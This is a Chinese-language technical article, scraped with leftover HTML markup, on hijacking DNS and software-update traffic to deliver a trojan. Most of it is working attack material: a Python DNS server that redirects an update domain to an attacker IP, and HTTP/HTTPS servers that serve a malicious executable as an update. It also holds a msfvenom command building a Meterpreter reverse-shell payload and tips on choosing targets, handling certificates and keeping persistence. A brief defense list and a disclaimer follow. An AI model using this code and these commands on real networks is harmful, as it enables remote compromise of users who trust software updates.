DNS劫持与流量植入木马技术分析<\/h1>

1. 技术概述<\/h2>
本技术通过劫持DNS解析和HTTP\/HTTPS流量，实现对目标软件更新过程的中间人攻击，从而植入恶意木马程序。主要适用于以下场景：<\/p>
已控制目标网络中的路由器或网络设备<\/li>
能够拦截内网用户流量<\/li>
目标软件使用HTTP\/HTTPS进行自动更新<\/li> <\/ul>
2. 技术实现步骤<\/h2>

2.1 DNS服务器部署<\/h3>

2.1.1 基本DNS劫持<\/h4>
使用修改后的Python DNS服务器脚本，实现对特定域名的劫持：<\/p>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span>"""
<\/span><\/span><\/span>Copyright (c) 2006-2016 sqlmap developers (http:\/\/sqlmap.org\/)
<\/span><\/span><\/span>"""<\/span>
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> re
<\/span><\/span>import<\/span> socket
<\/span><\/span>import<\/span> threading
<\/span><\/span>import<\/span> time
<\/span><\/span>import<\/span> dns.resolver
<\/span><\/span>
<\/span><\/span>class<\/span> DNSQuery<\/span>(object):
<\/span><\/span>    # DNS查询处理类<\/span>
<\/span><\/span>    def<\/span> __init__(self, raw):
<\/span><\/span>        self.<\/span>_raw =<\/span> raw
<\/span><\/span>        self.<\/span>_query =<\/span> ""<\/span>
<\/span><\/span>        type_ =<\/span> (ord(raw[2<\/span>]) >><\/span> 3<\/span>) &<\/span> 15<\/span>  # Opcode bits<\/span>
<\/span><\/span>        if<\/span> type_ ==<\/span> 0<\/span>:  # Standard query<\/span>
<\/span><\/span>            i =<\/span> 12<\/span>
<\/span><\/span>            j =<\/span> ord(raw[i])
<\/span><\/span>            while<\/span> j !=<\/span> 0<\/span>:
<\/span><\/span>                self.<\/span>_query +=<\/span> raw[i +<\/span> 1<\/span>:i +<\/span> j +<\/span> 1<\/span>] +<\/span> '.'<\/span>
<\/span><\/span>                i =<\/span> i +<\/span> j +<\/span> 1<\/span>
<\/span><\/span>                j =<\/span> ord(raw[i])
<\/span><\/span>
<\/span><\/span>    def<\/span> response<\/span>(self, resolution):
<\/span><\/span>        # 构造DNS响应包<\/span>
<\/span><\/span>        retVal =<\/span> ""<\/span>
<\/span><\/span>        if<\/span> self.<\/span>_query:
<\/span><\/span>            retVal +=<\/span> self.<\/span>_raw[:2<\/span>]  # Transaction ID<\/span>
<\/span><\/span>            retVal +=<\/span> "<\/span>\x85\x80<\/span>"<\/span>  # Flags (Standard query response, No error)<\/span>
<\/span><\/span>            retVal +=<\/span> self.<\/span>_raw[4<\/span>:6<\/span>] +<\/span> self.<\/span>_raw[4<\/span>:6<\/span>] +<\/span> "<\/span>\x00\x00\x00\x00<\/span>"<\/span>  # Questions and Answers Counts<\/span>
<\/span><\/span>            retVal +=<\/span> self.<\/span>_raw[12<\/span>:(12<\/span> +<\/span> self.<\/span>_raw[12<\/span>:].<\/span>find("<\/span>\x00<\/span>"<\/span>) +<\/span> 5<\/span>)]  # Original Domain Name Query<\/span>
<\/span><\/span>            retVal +=<\/span> "<\/span>\xc0\x0c<\/span>"<\/span>  # Pointer to domain name<\/span>
<\/span><\/span>            retVal +=<\/span> "<\/span>\x00\x01<\/span>"<\/span>  # Type A<\/span>
<\/span><\/span>            retVal +=<\/span> "<\/span>\x00\x01<\/span>"<\/span>  # Class IN<\/span>
<\/span><\/span>            retVal +=<\/span> "<\/span>\x00\x00\x00\x20<\/span>"<\/span>  # TTL (32 seconds)<\/span>
<\/span><\/span>            retVal +=<\/span> "<\/span>\x00\x04<\/span>"<\/span>  # Data length<\/span>
<\/span><\/span>            retVal +=<\/span> ""<\/span>.<\/span>join(chr(int(_)) for<\/span> _ in<\/span> resolution.<\/span>split('.'<\/span>))  # 4 bytes of IP<\/span>
<\/span><\/span>        return<\/span> retVal
<\/span><\/span>
<\/span><\/span>class<\/span> DNSServer<\/span>(object):
<\/span><\/span>    def<\/span> __init__(self):
<\/span><\/span>        self.<\/span>my_resolver =<\/span> dns.<\/span>resolver.<\/span>Resolver()
<\/span><\/span>        self.<\/span>my_resolver.<\/span>nameservers =<\/span> ['8.8.8.8'<\/span>]  # 使用Google DNS作为上游<\/span>
<\/span><\/span>        self.<\/span>_check_localhost()
<\/span><\/span>        self.<\/span>_requests =<\/span> []
<\/span><\/span>        self.<\/span>_lock =<\/span> threading.<\/span>Lock()
<\/span><\/span>        try<\/span>:
<\/span><\/span>            self.<\/span>_socket =<\/span> socket.<\/span>_orig_socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_DGRAM)
<\/span><\/span>        except<\/span> AttributeError<\/span>:
<\/span><\/span>            self.<\/span>_socket =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_DGRAM)
<\/span><\/span>        self.<\/span>_socket.<\/span>setsockopt(socket.<\/span>SOL_SOCKET, socket.<\/span>SO_REUSEADDR, 1<\/span>)
<\/span><\/span>        self.<\/span>_socket.<\/span>bind((""<\/span>, 53<\/span>))  # 绑定到53端口<\/span>
<\/span><\/span>        self.<\/span>_running =<\/span> False<\/span>
<\/span><\/span>        self.<\/span>_initialized =<\/span> False<\/span>
<\/span><\/span>
<\/span><\/span>    def<\/span> get_domain_A<\/span>(self, domain):
<\/span><\/span>        try<\/span>:
<\/span><\/span>            results =<\/span> self.<\/span>my_resolver.<\/span>query(domain, 'A'<\/span>)
<\/span><\/span>            for<\/span> i in<\/span> results.<\/span>response.<\/span>answer:
<\/span><\/span>                for<\/span> j in<\/span> i.<\/span>items:
<\/span><\/span>                    try<\/span>:
<\/span><\/span>                        ip_address =<\/span> j.<\/span>address
<\/span><\/span>                        if<\/span> re.<\/span>match('\d+\.+\d+\.+\d+\.+\d'<\/span>, ip_address):
<\/span><\/span>                            return<\/span> ip_address
<\/span><\/span>                    except<\/span> AttributeError<\/span> as<\/span> e:
<\/span><\/span>                        continue<\/span>
<\/span><\/span>        except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>            return<\/span> '127.0.0.1'<\/span>
<\/span><\/span>
<\/span><\/span>    def<\/span> run<\/span>(self):
<\/span><\/span>        def<\/span> _<\/span>():
<\/span><\/span>            try<\/span>:
<\/span><\/span>                self.<\/span>_running =<\/span> True<\/span>
<\/span><\/span>                self.<\/span>_initialized =<\/span> True<\/span>
<\/span><\/span>                while<\/span> True<\/span>:
<\/span><\/span>                    data, addr =<\/span> self.<\/span>_socket.<\/span>recvfrom(1024<\/span>)
<\/span><\/span>                    _ =<\/span> DNSQuery(data)
<\/span><\/span>                    domain =<\/span> _.<\/span>_query[:-<\/span>1<\/span>]
<\/span><\/span>                    ip =<\/span> self.<\/span>get_domain_A(domain)
<\/span><\/span>                    # 特定域名劫持<\/span>
<\/span><\/span>                    if<\/span> domain ==<\/span> 'cdn.netsarang.net'<\/span>:
<\/span><\/span>                        ip =<\/span> '192.168.80.142'<\/span>  # 攻击者服务器IP<\/span>
<\/span><\/span>                    print domain, ' -> '<\/span>, ip
<\/span><\/span>                    self.<\/span>_socket.<\/span>sendto(_.<\/span>response(ip), addr)
<\/span><\/span>                    with<\/span> self.<\/span>_lock:
<\/span><\/span>                        self.<\/span>_requests.<\/span>append(_.<\/span>_query)
<\/span><\/span>            except<\/span> KeyboardInterrupt<\/span>:
<\/span><\/span>                raise<\/span>
<\/span><\/span>            finally<\/span>:
<\/span><\/span>                self.<\/span>_running =<\/span> False<\/span>
<\/span><\/span>
<\/span><\/span>        thread =<\/span> threading.<\/span>Thread(target=<\/span>_)
<\/span><\/span>        thread.<\/span>daemon =<\/span> True<\/span>
<\/span><\/span>        thread.<\/span>start()
<\/span><\/span><\/code><\/pre>关键点：<\/p>

使用Google DNS(8.8.8.8)作为上游DNS服务器，确保普通域名正常解析<\/li>
对特定域名(如cdn.netsarang.net)返回攻击者控制的IP地址<\/li>
绑定到53端口，处理DNS查询请求<\/li>
<\/ol>
2.2 HTTP代理服务器部署<\/h3>
2.2.1 基本HTTP代理<\/h4>
# -*- coding: UTF-8 -*-<\/span>
<\/span><\/span>import<\/span> socket
<\/span><\/span>import<\/span> threading,<\/span> getopt,<\/span> sys,<\/span> string
<\/span><\/span>import<\/span> re
<\/span><\/span>
<\/span><\/span># 设置默认的最大连接数和端口号<\/span>
<\/span><\/span>list=<\/span>50<\/span>
<\/span><\/span>port=<\/span>80<\/span>
<\/span><\/span>file_contents=<\/span>open('myrat.exe'<\/span>,'rb'<\/span>).<\/span>read()
<\/span><\/span>
<\/span><\/span>def<\/span> req_server<\/span>():
<\/span><\/span>    return<\/span> 'HTTP\/1.1 200 OK<\/span>\r\n<\/span>Content-Length: 303641<\/span>\r\n<\/span>Content-Type: application\/force-download<\/span>\r\n<\/span>Last-Modified: Fri, 10 Jan 2014 03:54:35 GMT<\/span>\r\n<\/span>Accept-Ranges: bytes<\/span>\r\n<\/span>ETag: "80f5adb7dcf1:474"<\/span>\r\n<\/span>Server: Microsoft-IIS\/6.0<\/span>\r\n<\/span>X-Powered-By: ASP.NET<\/span>\r\n<\/span>Date: Thu, 24 May 2018 06:25:45 GMT<\/span>\r\n<\/span>Connection: close<\/span>\r\n\r\n<\/span>'<\/span>+<\/span>file_contents 
<\/span><\/span>
<\/span><\/span>def<\/span> jonnyS<\/span>(client, address):
<\/span><\/span>    try<\/span>:
<\/span><\/span>        # 设置超时时间<\/span>
<\/span><\/span>        client.<\/span>settimeout(500<\/span>)
<\/span><\/span>        # 接收数据<\/span>
<\/span><\/span>        buf =<\/span> client.<\/span>recv(2048<\/span>)
<\/span><\/span>        print buf
<\/span><\/span>        # 将恶意文件发送给客户端<\/span>
<\/span><\/span>        client.<\/span>send(req_server())
<\/span><\/span>    except<\/span> socket.<\/span>timeout:
<\/span><\/span>        print 'time out'<\/span>
<\/span><\/span>    # 关闭与客户端的连接<\/span>
<\/span><\/span>    client.<\/span>close()
<\/span><\/span>
<\/span><\/span>def<\/span> main<\/span>():
<\/span><\/span>    # 创建socket对象<\/span>
<\/span><\/span>    sock =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>    # 将socket绑定到指定地址<\/span>
<\/span><\/span>    sock.<\/span>bind(('0.0.0.0'<\/span>, port))
<\/span><\/span>    # 设置最多连接数量<\/span>
<\/span><\/span>    sock.<\/span>listen(list)
<\/span><\/span>    while<\/span> True<\/span>:
<\/span><\/span>        client, address =<\/span> sock.<\/span>accept()
<\/span><\/span>        thread =<\/span> threading.<\/span>Thread(target=<\/span>jonnyS, args=<\/span>(client, address))
<\/span><\/span>        thread.<\/span>start()
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    main()
<\/span><\/span><\/code><\/pre>关键点：<\/p>

监听80端口，等待HTTP连接<\/li>
当收到请求时，直接返回恶意文件(myrat.exe)<\/li>
伪造HTTP响应头，模拟合法软件更新服务器<\/li>
<\/ol>
2.3 HTTPS代理服务器部署<\/h3>
2.3.1 HTTPS代理实现<\/h4>
import<\/span> socketserver,<\/span> ssl,<\/span> time
<\/span><\/span>
<\/span><\/span>class<\/span> MyHTTPSHandler_socket<\/span>(socketserver.<\/span>BaseRequestHandler):
<\/span><\/span>    def<\/span> handle<\/span>(self):
<\/span><\/span>        context =<\/span> ssl.<\/span>SSLContext(ssl.<\/span>PROTOCOL_SSLv23)
<\/span><\/span>        context.<\/span>load_cert_chain(certfile=<\/span>"cert.pem"<\/span>)
<\/span><\/span>        SSLSocket =<\/span> context.<\/span>wrap_socket(self.<\/span>request, server_side=<\/span>True<\/span>)
<\/span><\/span>        self.<\/span>data =<\/span> SSLSocket.<\/span>recv(1024<\/span>)
<\/span><\/span>        print(self.<\/span>data)
<\/span><\/span>        file_contents=<\/span>open('myrat.exe'<\/span>,'rb'<\/span>).<\/span>read()
<\/span><\/span>        buf =<\/span> 'HTTP\/1.1 200 OK<\/span>\r\n<\/span>Content-Length: 303641<\/span>\r\n<\/span>Content-Type: application\/force-download<\/span>\r\n<\/span>Last-Modified: Fri, 10 Jan 2014 03:54:35 GMT<\/span>\r\n<\/span>Accept-Ranges: bytes<\/span>\r\n<\/span>ETag: "80f5adb7dcf1:474"<\/span>\r\n<\/span>Server: Microsoft-IIS\/6.0<\/span>\r\n<\/span>X-Powered-By: ASP.NET<\/span>\r\n<\/span>Date: Thu, 24 May 2018 06:25:45 GMT<\/span>\r\n<\/span>Connection: close<\/span>\r\n\r\n<\/span>'<\/span>+<\/span>file_contents 
<\/span><\/span>        SSLSocket.<\/span>send(buf)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    port =<\/span> 443<\/span>
<\/span><\/span>    httpd =<\/span> socketserver.<\/span>TCPServer(('0.0.0.0'<\/span>, port), MyHTTPSHandler_socket)
<\/span><\/span>    httpd.<\/span>serve_forever()
<\/span><\/span><\/code><\/pre>2.3.2 生成SSL证书<\/h4>
openssl req -new -x509 -keyout https_svr_key.pem -out https_svr_key.pem -days 3650<\/span> -nodes
<\/span><\/span><\/code><\/pre>关键点：<\/p>

使用SSLContext创建SSL上下文<\/li>
加载自签名证书<\/li>
对socket进行SSL包装，实现HTTPS服务<\/li>
同样返回恶意文件，但通过HTTPS协议<\/li>
<\/ol>
2.4 木马生成<\/h3>
使用Metasploit生成恶意负载：<\/p>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span>攻击者IP LPORT=<\/span>4444<\/span> -f exe -o myrat.exe
<\/span><\/span><\/code><\/pre>3. 攻击流程<\/h2>

部署DNS服务器，劫持目标域名(如软件更新域名)到攻击者服务器<\/li>
部署HTTP\/HTTPS代理服务器，监听相应端口<\/li>
当目标用户启动软件并检查更新时：

软件向被劫持域名发送更新请求<\/li>
DNS服务器返回攻击者服务器IP<\/li>
请求被重定向到攻击者服务器<\/li>
攻击者服务器返回恶意程序而非正常更新<\/li>
用户执行恶意程序，攻击者获得权限<\/li>
<\/ul>
<\/li>
<\/ol>
4. 技术要点与防御<\/h2>
4.1 攻击要点<\/h3>


目标选择<\/strong>：针对自动更新或后台静默更新的应用程序成功率更高<\/p>

如Xshell、Notepad++、Firefox等<\/li>
这类软件通常有自动更新功能且用户不易察觉<\/li>
<\/ul>
<\/li>

HTTPS处理<\/strong>：对于HTTPS流量需要注意证书问题<\/p>

使用CNAME记录绕过：将www.baidu.com重定向到www.exploit.com<\/li>
确保拥有www.exploit.com的合法证书<\/li>
<\/ul>
<\/li>

持久性控制<\/strong>：在路由器上修改DNS可作为持久性控制手段<\/p>

即使权限丢失，仍可通过DNS继续植入恶意程序<\/li>
<\/ul>
<\/li>
<\/ol>
4.2 防御措施<\/h3>


DNS安全<\/strong>：<\/p>

使用DNSSEC验证DNS响应<\/li>
使用可信的DNS服务器(如8.8.8.8、1.1.1.1)<\/li>
监控DNS查询异常<\/li>
<\/ul>
<\/li>

HTTPS验证<\/strong>：<\/p>

软件应严格验证更新服务器的证书<\/li>
使用证书固定技术(Certificate Pinning)<\/li>
<\/ul>
<\/li>

更新安全<\/strong>：<\/p>

验证下载文件的数字签名<\/li>
使用哈希校验下载文件完整性<\/li>
<\/ul>
<\/li>

网络监控<\/strong>：<\/p>

监控内网异常DNS请求<\/li>
检测异常流量模式<\/li>
<\/ul>
<\/li>
<\/ol>
5. 法律与道德声明<\/h2>
本技术文档仅用于安全研究与防御目的，未经授权对他人系统实施此类攻击是违法行为。安全研究人员应在合法授权范围内进行测试，并遵守相关法律法规。<\/p>
DNS劫持与流量植入木马技术分析<\/h1>

2. 技术实现步骤<\/h2>

2.1 DNS服务器部署<\/h3>

2.2 HTTP代理服务器部署<\/h3>

2.3 HTTPS代理服务器部署<\/h3>

4. 技术要点与防御<\/h2>

5. 法律与道德声明<\/h2> 本技术文档仅用于安全研究与防御目的，未经授权对他人系统实施此类攻击是违法行为。安全研究人员应在合法授权范围内进行测试，并遵守相关法律法规。<\/p>

5. 法律与道德声明<\/h2>
本技术文档仅用于安全研究与防御目的，未经授权对他人系统实施此类攻击是违法行为。安全研究人员应在合法授权范围内进行测试，并遵守相关法律法规。<\/p>
